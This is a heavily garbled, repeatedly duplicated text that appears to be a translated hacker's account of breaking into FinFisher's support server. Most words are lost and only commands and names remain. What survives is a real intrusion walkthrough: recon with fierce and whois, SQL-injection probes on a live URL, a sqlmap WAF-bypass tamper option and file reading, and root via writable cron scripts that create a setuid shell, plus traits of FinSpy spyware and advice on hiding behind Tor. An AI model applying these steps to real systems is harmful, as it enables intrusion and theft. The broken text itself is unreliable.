, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (   22, 53, 80, 443, 4111 (  -   ). 


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (   22, 53, 80, 443, 4111 (  -   ). 


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
